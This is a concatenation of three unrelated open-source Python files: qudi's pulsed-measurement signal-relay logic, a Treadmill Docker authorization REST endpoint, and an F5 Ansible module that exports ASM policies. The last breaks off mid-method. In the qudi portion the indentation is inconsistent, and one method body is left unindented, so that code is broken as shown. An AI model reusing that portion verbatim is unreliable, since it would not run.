    @param str activation_config_name: name of the channel activation config
    @param dict analogue_amplitude: analogue channel amplitude settings
    @param bool interleave_on: whether interleave mode is enabled
    @return: None
    """
    self.sigPulseGeneratorSettingsChanged.emit(sample_rate_hz, activation_config_name,
                                               analogue_amplitude, interleave_on)
    return
def pulse_generator_settings_updated(self, sample_rate_hz, activation_config_name,
                                     analogue_amplitude, interleave_on):
    """ Slot for the measurement logic's confirmation; resolves the named
    activation config to the actual channel list and forwards everything to
    the GUI.

    @param float sample_rate_hz: generator sample rate in Hz
    @param str activation_config_name: name of the channel activation config
    @param dict analogue_amplitude: analogue channel amplitude settings
    @param bool interleave_on: whether interleave mode is enabled
    @return: None
    """
    # Look up the channel list for the named config in the pulser hardware
    # constraints so the GUI receives the concrete configuration.
    activation_config = self._measurement_logic.get_pulser_constraints()['activation_config'][
        activation_config_name]
    self.sigPulserSettingsUpdated.emit(sample_rate_hz, activation_config_name,
                                       activation_config, analogue_amplitude, interleave_on)
    return
def analysis_windows_changed(self, signal_start_bin, signal_width_bins, norm_start_bin,
                             norm_width_bins):
    """ Forward new analysis window settings (in counter bins) to the
    measurement logic.

    @param int signal_start_bin: first bin of the signal window
    @param int signal_width_bins: width of the signal window in bins
    @param int norm_start_bin: first bin of the normalisation window
    @param int norm_width_bins: width of the normalisation window in bins
    @return: None
    """
    self.sigAnalysisWindowsChanged.emit(signal_start_bin, signal_width_bins, norm_start_bin,
                                        norm_width_bins)
    return
def analysis_windows_updated(self, signal_start_bin, signal_width_bins, norm_start_bin,
                             norm_width_bins):
    """ Slot for the measurement logic's confirmation; forwards the applied
    analysis windows to the GUI.

    @param int signal_start_bin: first bin of the signal window
    @param int signal_width_bins: width of the signal window in bins
    @param int norm_start_bin: first bin of the normalisation window
    @param int norm_width_bins: width of the normalisation window in bins
    @return: None
    """
    self.sigAnalysisWindowsUpdated.emit(signal_start_bin, signal_width_bins, norm_start_bin,
                                        norm_width_bins)
    return
def do_fit(self, fit_function):
    """ Request a fit of the current data from the measurement logic.

    @param str fit_function: name of the fit function to apply
    @return: None
    """
    self.sigDoFit.emit(fit_function)
    return
def fit_updated(self, fit_function, fit_data_x, fit_data_y, param_dict, result_dict):
    """ Slot for the measurement logic's fit result; forwards it to the GUI.

    @param str fit_function: name of the fit function that was applied
    @param numpy.ndarray fit_data_x: x values of the fitted curve
    @param numpy.ndarray fit_data_y: y values of the fitted curve
    @param dict param_dict: fitted parameters
    @param object result_dict: full fit result object
    @return: None
    """
    self.sigFitUpdated.emit(fit_function, fit_data_x, fit_data_y, param_dict, result_dict)
    return
def analysis_interval_changed(self, analysis_interval_s):
    """ Forward a new analysis timer interval to the measurement logic.

    @param float analysis_interval_s: analysis timer interval in seconds
    @return: None
    """
    self.sigTimerIntervalChanged.emit(analysis_interval_s)
    return
def analysis_interval_updated(self, analysis_interval_s):
    """ Slot for the measurement logic's confirmation; forwards the applied
    analysis timer interval to the GUI.

    @param float analysis_interval_s: analysis timer interval in seconds
    @return: None
    """
    self.sigTimerIntervalUpdated.emit(analysis_interval_s)
    return
def manually_pull_data(self):
    """ Request an immediate data pull from the fast counter, outside the
    regular analysis timer cycle.

    @return: None
    """
    self.sigManuallyPullData.emit()
    return
def start_measurement(self):
    """ Request the start of the pulsed measurement.

    @return: None
    """
    #if self.manual_xaxis_def:
    #if self.manual_laser_def:
    self.sigStartMeasurement.emit()
    return
def stop_measurement(self):
    """ Request the stop of the pulsed measurement.

    @return: None
    """
    self.sigStopMeasurement.emit()
    return
def pause_measurement(self):
    """ Request pausing the running pulsed measurement.

    @return: None
    """
    self.sigPauseMeasurement.emit()
    return
def continue_measurement(self):
    """ Request continuing a paused pulsed measurement.

    @return: None
    """
    self.sigContinueMeasurement.emit()
    return
def measurement_status_updated(self, is_running, is_paused):
    """ Slot for the measurement logic's status signal; records the running
    state in status_dict and forwards both flags to the GUI.

    @param bool is_running: whether a measurement is currently running
    @param bool is_paused: whether the measurement is paused
    @return: None
    """
    self.status_dict['measurement_running'] = is_running
    self.sigMeasurementStatusUpdated.emit(is_running, is_paused)
    return
def measurement_time_updated(self, elapsed_time, elapsed_time_string):
    """ Slot for the measurement logic's elapsed-time signal; forwards it to
    the GUI.

    @param float elapsed_time: elapsed measurement time
    @param str elapsed_time_string: formatted elapsed time for display
    @return: None
    """
    self.sigElapsedTimeUpdated.emit(elapsed_time, elapsed_time_string)
    return
def toggle_pulse_generator(self, switch_on):
    """ Request switching the pulse generator hardware on or off.

    @param bool switch_on: True requests a pulser start, False a pulser stop
    @return: None
    """
    request = self.sigStartPulser if switch_on else self.sigStopPulser
    request.emit()
    def pulser_running_updated(self, is_running):
        """ Record the pulser run state and relay it to connected GUIs.

        @param bool is_running: True if the pulse generator is currently running
        @return: None
        """
        self.status_dict['pulser_running'] = is_running
        self.sigPulserRunningUpdated.emit(is_running)
        return
    def save_measurement_data(self, save_tag):
        """ Save the current measurement data.

        Note: this is a direct (synchronous) call into the measurement logic,
        not a queued signal like most other methods in this class.

        @param str save_tag: tag appended to the resulting file name
        @return: None
        """
        self._measurement_logic.save_measurement_data(save_tag)
        return
    def clear_pulse_generator(self):
        """ Request clearing of all waveforms/sequences from the pulse generator memory.

        @return: None
        """
        self.sigClearPulseGenerator.emit()
        return
    def upload_asset(self, asset_name):
        """ Request upload of a sampled asset to the pulse generator hardware.

        @param str asset_name: name of the asset to upload
        @return: None
        """
        # Mark the upload as in progress; cleared again in upload_asset_finished.
        self.status_dict['upload_busy'] = True
        self.sigUploadAsset.emit(asset_name)
        return
    def upload_asset_finished(self, asset_name):
        """ Handle completion of an asset upload.

        If a combined sample-upload-load ('sauplo') cycle is in progress, the
        freshly uploaded asset is immediately loaded into the pulser channels.

        @param str asset_name: name of the asset that finished uploading
        @return: None
        """
        if self.status_dict['sauplo_busy']:
            self.load_asset_into_channels(asset_name)
        self.log.debug('PULSEDMASTER: Asset "{0}" uploaded!'.format(asset_name))
        self.status_dict['upload_busy'] = False
        self.sigAssetUploaded.emit(asset_name)
        return
    def uploaded_assets_updated(self, asset_names_list):
        """ Relay the list of assets currently present on the pulser hardware.

        @param list asset_names_list: names of all uploaded assets
        @return: None
        """
        self.sigUploadedAssetsUpdated.emit(asset_names_list)
        return
def load_asset_into_channels(self, asset_name, load_dict={}, invoke_settings=False):
"""
@param asset_name:
@param load_dict:
@param bool invoke_settings: Specifies whether the measurement parameters should be chosen
according to the loaded assets metadata.
@return:
"""
# FIXME: implement that! Changes in Pulse objects and measurement logic parameters needed
# invoke measurement parameters from asset object
# if invoke_settings:
# # get asset object
# asset_obj = self._generator_logic.get_saved_asset(asset_name)
# # Set proper activation config
# activation_config = asset_obj.activation_config
# config_name = None
# avail_configs = self._measurement_logic.get_pulser_constraints()['activation_config']
# for config in avail_configs:
# if activation_config == avail_configs[config]:
# config_name = config
# break
#
#
# # set proper number of laser pulses
# if self._measurement_logic.number_of_lasers != asset_obj.number_of_lasers:
# self.num_laserpulses_changed(asset_obj.number_of_lasers)
# # set proper sequence length
# self._measurement_logic.sequence_length_s = asset_obj.length_bins / asset_obj.sample_rate
# self.pulse_generator_settings_changed(asset_obj.sample_rate, config_name, amplitude_dict, None)
# self.measurement_sequence_settings_changed(asset_obj.measurement_ticks_list, sequence_length, laser_ignore_list, alternating, laser_trigger_delay)
self.status_dict['loading_busy'] = True
self.sigLoadAsset.emit(asset_name, load_dict)
return
    def loaded_asset_updated(self, asset_name):
        """ Handle notification that an asset has been loaded into the pulser channels.

        Determines the asset type from the saved asset object and clears the
        sample-upload-load / loading busy flags.

        @param str asset_name: name of the loaded asset (None if nothing is loaded)
        @return: (str, str) the asset name and its type name
        """
        if asset_name is not None:
            asset_object = self._generator_logic.get_saved_asset(asset_name)
            asset_type = type(asset_object).__name__
        else:
            asset_type = 'No asset loaded'
        self.log.debug('PULSEDMASTER: Asset "{0}" of type "{1}" loaded into pulser channel(s)!'.format(asset_name, asset_type))
        self.status_dict['sauplo_busy'] = False
        self.status_dict['loading_busy'] = False
        self.sigLoadedAssetUpdated.emit(asset_name, asset_type)
        return asset_name, asset_type
    def laser_to_show_changed(self, laser_pulse_index, get_raw_pulse):
        """ Forward the selection of which laser pulse to display.

        @param int laser_pulse_index: index of the laser pulse to show
        @param bool get_raw_pulse: True to show the raw (unfiltered) pulse data
        @return: None
        """
        self.sigLaserToShowChanged.emit(laser_pulse_index, get_raw_pulse)
        return
    def laser_to_show_updated(self, laser_pulse_index, get_raw_pulse):
        """ Relay the updated laser pulse display selection to connected GUIs.

        @param int laser_pulse_index: index of the laser pulse being shown
        @param bool get_raw_pulse: True if the raw (unfiltered) pulse data is shown
        @return: None
        """
        self.sigLaserToShowUpdated.emit(laser_pulse_index, get_raw_pulse)
        return
    def laser_data_updated(self, laser_data_x, laser_data_y):
        """ Relay extracted laser pulse data to connected GUIs.

        @param laser_data_x: x-axis values of the laser pulse trace
        @param laser_data_y: y-axis values of the laser pulse trace
        @return: None
        """
        self.sigLaserDataUpdated.emit(laser_data_x, laser_data_y)
        return
    def signal_data_updated(self, signal_data_x, signal_data_y, signal_data_y2, error_data_y, error_data_y2):
        """ Relay analysed signal data (including the alternating second trace) to GUIs.

        @param signal_data_x: x-axis values of the measurement
        @param signal_data_y: y-axis values of the first signal trace
        @param signal_data_y2: y-axis values of the second (alternating) signal trace
        @param error_data_y: error values for the first trace
        @param error_data_y2: error values for the second trace
        @return: None
        """
        self.sigSignalDataUpdated.emit(signal_data_x, signal_data_y, signal_data_y2, error_data_y, error_data_y2)
        return
    def analysis_method_changed(self, gaussfilt_std_dev):
        """ Forward a new analysis method setting to the measurement logic.

        @param float gaussfilt_std_dev: standard deviation of the Gaussian filter
        @return: None
        """
        self.sigAnalysisMethodChanged.emit(gaussfilt_std_dev)
        return
    def analysis_method_updated(self, gaussfilt_std_dev):
        """ Relay the updated analysis method setting to connected GUIs.

        @param float gaussfilt_std_dev: standard deviation of the Gaussian filter
        @return: None
        """
        self.sigAnalysisMethodUpdated.emit(gaussfilt_std_dev)
        return
#######################################################################
### Sequence generator methods ###
#######################################################################
    def request_generator_init_values(self):
        """ Ask the sequence generator logic to (re-)emit its current settings.

        @return: None
        """
        self.sigRequestGeneratorInitValues.emit()
        return
    def save_pulse_block(self, block_name, block_object):
        """ Request saving of a PulseBlock object in the generator logic.

        @param str block_name: name under which to save the block
        @param block_object: the PulseBlock instance to save
        @return: None
        """
        self.sigSavePulseBlock.emit(block_name, block_object)
        return
    def save_block_ensemble(self, ensemble_name, ensemble_object):
        """ Attach current generator settings as metadata and save a PulseBlockEnsemble.

        @param str ensemble_name: name under which to save the ensemble
        @param ensemble_object: the PulseBlockEnsemble instance to save
        @return: None
        """
        # add non-crucial parameters. Metadata for pulser settings upon load into channels.
        ensemble_object.sample_rate = self._generator_logic.sample_rate
        ensemble_object.activation_config = self._generator_logic.activation_config
        ensemble_object.amplitude_dict = self._generator_logic.amplitude_dict
        ensemble_object.laser_channel = self._generator_logic.laser_channel
        self.sigSaveBlockEnsemble.emit(ensemble_name, ensemble_object)
        return
    def save_sequence(self, sequence_name, sequence_object):
        """ Attach current generator settings as metadata and save a PulseSequence.

        @param str sequence_name: name under which to save the sequence
        @param sequence_object: the PulseSequence instance to save
        @return: None
        """
        # Metadata for pulser settings upon load into channels.
        sequence_object.sample_rate = self._generator_logic.sample_rate
        sequence_object.activation_config = self._generator_logic.activation_config
        sequence_object.amplitude_dict = self._generator_logic.amplitude_dict
        sequence_object.laser_channel = self._generator_logic.laser_channel
        self.sigSaveSequence.emit(sequence_name, sequence_object)
        return
    def load_pulse_block(self, block_name):
        """ Request loading of a saved PulseBlock into the editor.

        @param str block_name: name of the block to load
        @return: None
        """
        self.sigLoadPulseBlock.emit(block_name)
        return
    def load_block_ensemble(self, ensemble_name):
        """ Request loading of a saved PulseBlockEnsemble into the editor.

        @param str ensemble_name: name of the ensemble to load
        @return: None
        """
        self.sigLoadBlockEnsemble.emit(ensemble_name)
        return
    def load_sequence(self, sequence_name):
        """ Request loading of a saved PulseSequence into the editor.

        @param str sequence_name: name of the sequence to load
        @return: None
        """
        self.sigLoadSequence.emit(sequence_name)
        return
    def current_pulse_block_updated(self, block_object):
        """ Relay the currently edited PulseBlock object to connected GUIs.

        @param block_object: the current PulseBlock instance
        @return: None
        """
        self.sigCurrentPulseBlockUpdated.emit(block_object)
        return
    def current_block_ensemble_updated(self, ensemble_object):
        """ Relay the currently edited PulseBlockEnsemble object to connected GUIs.

        @param ensemble_object: the current PulseBlockEnsemble instance
        @return: None
        """
        self.sigCurrentBlockEnsembleUpdated.emit(ensemble_object)
        return
    def current_sequence_updated(self, sequence_object):
        """ Relay the currently edited PulseSequence object to connected GUIs.

        @param sequence_object: the current PulseSequence instance
        @return: None
        """
        self.sigCurrentSequenceUpdated.emit(sequence_object)
        return
    def delete_pulse_block(self, block_name):
        """ Request deletion of a saved PulseBlock.

        @param str block_name: name of the block to delete
        @return: None
        """
        self.sigDeletePulseBlock.emit(block_name)
        return
    def delete_block_ensemble(self, ensemble_name):
        """ Request deletion of a saved PulseBlockEnsemble.

        @param str ensemble_name: name of the ensemble to delete
        @return: None
        """
        self.sigDeleteBlockEnsemble.emit(ensemble_name)
        return
    def delete_sequence(self, sequence_name):
        """ Request deletion of a saved PulseSequence.

        @param str sequence_name: name of the sequence to delete
        @return: None
        """
        self.sigDeleteSequence.emit(sequence_name)
        return
    def saved_pulse_blocks_updated(self, block_dict):
        """ Relay the dictionary of saved PulseBlocks to connected GUIs.

        @param dict block_dict: mapping of block names to PulseBlock objects
        @return: None
        """
        self.sigSavedPulseBlocksUpdated.emit(block_dict)
        return
    def saved_block_ensembles_updated(self, ensemble_dict):
        """ Relay the dictionary of saved PulseBlockEnsembles to connected GUIs.

        @param dict ensemble_dict: mapping of ensemble names to PulseBlockEnsemble objects
        @return: None
        """
        self.sigSavedBlockEnsemblesUpdated.emit(ensemble_dict)
        return
    def saved_sequences_updated(self, sequence_dict):
        """ Relay the dictionary of saved PulseSequences to connected GUIs.

        @param dict sequence_dict: mapping of sequence names to PulseSequence objects
        @return: None
        """
        self.sigSavedSequencesUpdated.emit(sequence_dict)
        return
    def sample_block_ensemble(self, ensemble_name, write_to_file, write_chunkwise, sample_upload_load = False):
        """ Request sampling of a PulseBlockEnsemble into a waveform.

        @param str ensemble_name: name of the ensemble to sample
        @param bool write_to_file: True to write the samples to file
        @param bool write_chunkwise: True to write the file in chunks (saves memory)
        @param bool sample_upload_load: True to chain sampling, upload and loading
                                        into the pulser channels ('sauplo' cycle)
        @return: None
        """
        if sample_upload_load:
            self.status_dict['sauplo_busy'] = True
        self.status_dict['sampling_busy'] = True
        self.sigSampleBlockEnsemble.emit(ensemble_name, write_to_file, write_chunkwise)
        return
    def sample_sequence(self, sequence_name, write_to_file, write_chunkwise, sample_upload_load = False):
        """ Request sampling of a PulseSequence into waveforms.

        @param str sequence_name: name of the sequence to sample
        @param bool write_to_file: True to write the samples to file
        @param bool write_chunkwise: True to write the file in chunks (saves memory)
        @param bool sample_upload_load: True to chain sampling, upload and loading
                                        into the pulser channels ('sauplo' cycle)
        @return: None
        """
        if sample_upload_load:
            self.status_dict['sauplo_busy'] = True
        self.status_dict['sampling_busy'] = True
        self.sigSampleSequence.emit(sequence_name, write_to_file, write_chunkwise)
        return
    def sample_ensemble_finished(self, ensemble_name):
        """ Handle completion of ensemble sampling; continue the 'sauplo' chain if active.

        @param str ensemble_name: name of the sampled ensemble
        @return: None
        """
        if self.status_dict['sauplo_busy']:
            self.upload_asset(ensemble_name)
        self.log.debug('PULSEDMASTER: Sampling of ensemble "{0}" finished!'.format(ensemble_name))
        self.status_dict['sampling_busy'] = False
        self.sigBlockEnsembleSampled.emit(ensemble_name)
        return
    def sample_sequence_finished(self, sequence_name):
        """ Handle completion of sequence sampling; continue the 'sauplo' chain if active.

        @param str sequence_name: name of the sampled sequence
        @return: None
        """
        if self.status_dict['sauplo_busy']:
            self.upload_asset(sequence_name)
        self.log.debug('PULSEDMASTER: Sampling of sequence "{0}" finished!'.format(sequence_name))
        self.status_dict['sampling_busy'] = False
        self.sigSequenceSampled.emit(sequence_name)
        return
    def generator_settings_changed(self, activation_config_name, laser_channel, sample_rate,
                                   amplitude_dict):
        """ Validate requested generator settings against pulser constraints and forward them.

        Invalid values are replaced by the first valid alternative (with a warning)
        rather than rejected, so the generator always ends up in a usable state.

        @param str activation_config_name: name of the channel activation config
        @param str laser_channel: channel used for the laser trigger
        @param float sample_rate: sample rate in Hz
        @param dict amplitude_dict: analog channel amplitudes
        @return: None
        """
        # get pulser constraints
        pulser_constraints = self._measurement_logic.get_pulser_constraints()
        # activation config
        config_constraint = pulser_constraints['activation_config']
        if activation_config_name not in config_constraint:
            new_config_name = list(config_constraint.keys())[0]
            self.log.warning('Activation config "{0}" could not be found in pulser constraints. '
                             'Choosing first valid config "{1}" '
                             'instead.'.format(activation_config_name, new_config_name))
            activation_config_name = new_config_name
        activation_config = config_constraint[activation_config_name]
        # laser channel: prefer a digital channel, fall back to an analog one
        if laser_channel not in activation_config:
            old_laser_chnl = laser_channel
            laser_channel = None
            for chnl in activation_config:
                if chnl.startswith('d_ch'):
                    laser_channel = chnl
                    break
            if laser_channel is None:
                for chnl in activation_config:
                    if chnl.startswith('a_ch'):
                        laser_channel = chnl
                        break
            self.log.warning('Laser channel "{0}" could not be found in generator activation '
                             'config "{1}". Using first valid channel "{2}" instead.'
                             ''.format(old_laser_chnl, activation_config, laser_channel))
        # sample rate
        samplerate_constraint = pulser_constraints['sample_rate']
        if sample_rate < samplerate_constraint['min'] or sample_rate > samplerate_constraint['max']:
            self.log.warning('Sample rate of {0} MHz lies not within pulse generator constraints. '
                             'Using max. allowed sample rate of {1} MHz instead.'
                             ''.format(sample_rate, samplerate_constraint['max']))
            sample_rate = samplerate_constraint['max']
        # amplitude dictionary
        # FIXME: check with pulser constraints
        self.sigGeneratorSettingsChanged.emit(activation_config, laser_channel, sample_rate,
                                              amplitude_dict)
        return
    def generator_settings_updated(self, activation_config, laser_channel, sample_rate,
                                   amplitude_dict):
        """ Relay updated generator settings to connected GUIs.

        Resolves the activation config name from the config list; if the config is
        unknown, the request is re-validated via generator_settings_changed instead.

        @param list activation_config: list of active channel names
        @param str laser_channel: channel used for the laser trigger
        @param float sample_rate: sample rate in Hz
        @param dict amplitude_dict: analog channel amplitudes
        @return: None
        """
        # retrieve hardware constraints
        pulser_constraints = self._measurement_logic.get_pulser_constraints()
        # check activation_config
        config_dict = pulser_constraints['activation_config']
        activation_config_name = ''
        for key in config_dict.keys():
            if config_dict[key] == activation_config:
                activation_config_name = key
        if activation_config_name == '':
            activation_config_name = list(config_dict.keys())[0]
            activation_config = config_dict[activation_config_name]
            self.log.warning('Activation config "{0}" could not be found in pulser constraints. '
                             'Taking first valid config "{1}" '
                             'instead.'.format(activation_config, activation_config_name))
            self.generator_settings_changed(activation_config_name, laser_channel, sample_rate,
                                            amplitude_dict)
        else:
            self.sigGeneratorSettingsUpdated.emit(activation_config_name, activation_config,
                                                  sample_rate, amplitude_dict, laser_channel)
        return
    def generate_predefined_sequence(self, generator_method_name, arg_list):
        """ Request generation of a predefined sequence by name.

        @param str generator_method_name: name of the predefined generator method
        @param list arg_list: positional arguments for the generator method
        @return: None
        """
        self.sigGeneratePredefinedSequence.emit(generator_method_name, arg_list)
        return
    def predefined_sequence_generated(self, generator_method_name):
        """ Relay completion of a predefined sequence generation to connected GUIs.

        @param str generator_method_name: name of the generator method that finished
        @return: None
        """
        self.sigPredefinedSequenceGenerated.emit(generator_method_name)
        return
    def predefined_sequences_updated(self, generator_methods_dict):
        """ Relay the dictionary of available predefined generator methods to GUIs.

        @param dict generator_methods_dict: mapping of method names to callables
        @return: None
        """
        self.sigPredefinedSequencesUpdated.emit(generator_methods_dict)
        return
| drogenlied/qudi | logic/pulsed_master_logic.py | Python | gpl-3.0 | 45,610 |
"""Treadmill docker authz REST api.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import http.client
import flask
import flask_restplus as restplus
_URL = 'AuthZPlugin.AuthZRes'
def init(api, cors, impl):
    """Configures REST handlers for docker authz resource.

    :param api: ``flask_restplus.Api`` instance the namespace is attached to.
    :param cors: CORS handler; unused here but part of the common init signature.
    :param impl: implementation object providing ``authzres(payload)``.
    :returns: the namespace URL (returned explicitly because it contains '.').
    """
    del cors
    namespace = api.namespace(
        _URL, description='Docker authz plugin authz response call'
    )
    # authz plugin does not accept trailing '/'
    @namespace.route('')
    class _Authz(restplus.Resource):
        """Docker authz plugin response resource."""
        def post(self):
            """Evaluate the authz request payload and return allow/deny."""
            status = http.client.OK
            payload = flask.request.get_json(force=True)
            (allow, msg) = impl.authzres(payload)
            # Build the response manually (not jsonify) to keep the exact
            # body shape the docker authz plugin protocol expects.
            return flask.Response(
                json.dumps({'allow': allow, 'msg': msg}),
                status=status,
                mimetype='application/json'
            )
    # return URL explicitly because there is '.' in URL
    return _URL
| Morgan-Stanley/treadmill | lib/python/treadmill/rest/api/docker_authz/authzres.py | Python | apache-2.0 | 1,151 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2018, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_asm_policy_fetch
short_description: Exports the asm policy from remote nodes.
description:
- Exports the asm policy from remote nodes.
version_added: 2.8
options:
name:
description:
- The name of the policy exported to create a file on the remote device for downloading.
required: True
dest:
description:
- A directory to save the policy file into.
    - This option is ignored when C(inline) is set to C(yes).
type: path
file:
description:
    - The name of the file to be created on the remote device for downloading.
- When C(binary) is set to C(no) the ASM policy will be in XML format.
inline:
description:
- If C(yes), the ASM policy will be exported C(inline) as a string instead of a file.
- The policy can be be retrieved in playbook C(result) dictionary under C(inline_policy) key.
type: bool
compact:
description:
- If C(yes), only the ASM policy custom settings will be exported.
- Only applies to XML type ASM policy exports.
type: bool
base64:
description:
- If C(yes), the returned C(inline) ASM policy content will be Base64 encoded.
- Only applies to C(inline) ASM policy exports.
type: bool
binary:
description:
- If C(yes), the exported ASM policy will be in binary format.
- Only applies to C(file) ASM policy exports.
type: bool
force:
description:
    - If C(no), the file will only be transferred if it does not exist in the destination.
default: yes
type: bool
partition:
description:
- Device partition which contains ASM policy to export.
default: Common
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Export policy in binary format
bigip_asm_policy_fetch:
name: foobar
file: export_foo
dest: /root/download
binary: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy inline base64 encoded format
bigip_asm_policy_fetch:
name: foobar
inline: yes
base64: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy in XML format
bigip_asm_policy_fetch:
name: foobar
file: export_foo
dest: /root/download
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export compact policy in XML format
bigip_asm_policy_fetch:
name: foobar
file: export_foo.xml
dest: /root/download/
compact: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Export policy in binary format, autogenerate name
bigip_asm_policy_fetch:
name: foobar
dest: /root/download/
binary: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
name:
description: Name of the ASM policy to be exported.
returned: changed
type: str
sample: Asm_APP1_Transparent
dest:
description: Local path to download exported ASM policy.
returned: changed
type: str
sample: /root/downloads/foobar.xml
file:
description:
- Name of the policy file on the remote BIG-IP to download. If not
specified, then this will be a randomly generated filename.
returned: changed
type: str
sample: foobar.xml
inline:
description: Set when ASM policy to be exported inline
returned: changed
type: bool
sample: yes
compact:
description: Set only to export custom ASM policy settings.
returned: changed
type: bool
sample: no
base64:
description: Set to encode inline export in base64 format.
returned: changed
type: bool
sample: no
binary:
description: Set to export ASM policy in binary format.
returned: changed
type: bool
sample: yes
'''
import os
import time
import tempfile
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import cleanup_tokens
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import exit_json
from library.module_utils.network.f5.common import fail_json
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.icontrol import download_file
from library.module_utils.network.f5.icontrol import module_provisioned
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import cleanup_tokens
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import exit_json
from ansible.module_utils.network.f5.common import fail_json
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.icontrol import download_file
from ansible.module_utils.network.f5.icontrol import module_provisioned
class Parameters(AnsibleF5Parameters):
    """Base parameter container mapping Ansible option names to F5 API names."""

    # Ansible option name <- API attribute name
    api_map = {
        'filename': 'file',
        'minimal': 'compact',
        'isBase64': 'base64',
    }

    # Attributes sent to the device API.
    api_attributes = [
        'inline',
        'minimal',
        'isBase64',
        'policyReference',
        'filename',
    ]

    # Values reported back to the user in the module result.
    returnables = [
        'file',
        'compact',
        'base64',
        'inline',
        'force',
        'binary',
        'dest',
        'name',
        'inline_policy',
    ]

    # No updatable attributes; this module only exports.
    updatables = [
    ]
class ApiParameters(Parameters):
    """Parameters as reported by the device API (no customization needed)."""
    pass
class ModuleParameters(Parameters):
    """Parameters supplied by the user via the Ansible task."""

    def _policy_exists(self):
        """Return True if the named ASM policy exists in the given partition."""
        uri = 'https://{0}:{1}/mgmt/tm/asm/policies/'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        # Read the raw values directly: the 'name' property calls this method,
        # so going through the property would recurse. (The original code
        # referenced self.want.*, which does not exist on a Parameters object.)
        query = "?$filter=contains(name,'{0}')+and+contains(partition,'{1}')&$select=name,partition".format(
            self._values['name'], self._values['partition']
        )
        resp = self.client.api.get(uri + query)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'items' in response and response['items'] != []:
            return True
        return False

    @property
    def name(self):
        """Name of the policy; raises if the policy is absent on the device."""
        if self._policy_exists():
            return self._values['name']
        else:
            raise F5ModuleError(
                "The specified ASM policy {0} on partition {1} does not exist on device.".format(
                    self._values['name'], self._values['partition']
                )
            )

    @property
    def file(self):
        """Remote file name; auto-generated with a type-appropriate suffix if unset."""
        if self._values['file'] is not None:
            return self._values['file']
        # NOTE: tempfile._get_candidate_names() is a private stdlib API that
        # upstream relies on for a random name; kept for behavioral parity.
        if self.binary:
            result = next(tempfile._get_candidate_names()) + '.plc'
        else:
            result = next(tempfile._get_candidate_names()) + '.xml'
        self._values['file'] = result
        return result

    @property
    def fulldest(self):
        """Full local destination path, validated for existence and writability."""
        if os.path.isdir(self.dest):
            result = os.path.join(self.dest, self.file)
        else:
            if os.path.exists(os.path.dirname(self.dest)):
                result = self.dest
            else:
                try:
                    # os.path.exists() can return false in some
                    # circumstances where the directory does not have
                    # the execute bit for the current user set, in
                    # which case the stat() call will raise an OSError
                    # BUGFIX: the original used os.path.dirname(result) here
                    # while result was still None, crashing with a TypeError.
                    os.stat(os.path.dirname(self.dest))
                except OSError as e:
                    if "permission denied" in str(e).lower():
                        raise F5ModuleError(
                            "Destination directory {0} is not accessible".format(
                                os.path.dirname(self.dest)
                            )
                        )
                    raise F5ModuleError(
                        "Destination directory {0} does not exist".format(
                            os.path.dirname(self.dest)
                        )
                    )
                # stat() succeeded, so the directory does exist after all.
                result = self.dest
        # Check writability for every branch (the is-dir case was previously skipped).
        if not os.access(os.path.dirname(result), os.W_OK):
            raise F5ModuleError(
                "Destination {0} not writable".format(os.path.dirname(result))
            )
        return result

    @property
    def inline(self):
        result = flatten_boolean(self._values['inline'])
        if result == 'yes':
            return True
        elif result == 'no':
            return False

    @property
    def compact(self):
        result = flatten_boolean(self._values['compact'])
        if result == 'yes':
            return True
        elif result == 'no':
            return False

    @property
    def base64(self):
        result = flatten_boolean(self._values['base64'])
        if result == 'yes':
            return True
        elif result == 'no':
            return False
class Changes(Parameters):
    """Parameter container for values to be reported back to the user."""

    def to_return(self):
        """Assemble the filtered dict of returnable values.

        NOTE: the broad except deliberately returns a partial (possibly
        empty) result instead of failing the module on a bad attribute.
        """
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            pass
        return result
class UsableChanges(Changes):
    """Changes in the form consumed by the device API."""
    pass
class ReportableChanges(Changes):
    """Changes in the form reported back to the Ansible user."""
    pass
class ModuleManager(object):
    """Orchestrates the ASM policy export: sampling the export task on the
    device, downloading the resulting file and cleaning up afterwards."""

    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = kwargs.get('client', None)
        self.want = ModuleParameters(params=self.module.params)
        self.changes = UsableChanges()

    def _set_changed_options(self):
        """Copy all user-supplied returnable options into the changes object."""
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)

    def _announce_deprecations(self, result):
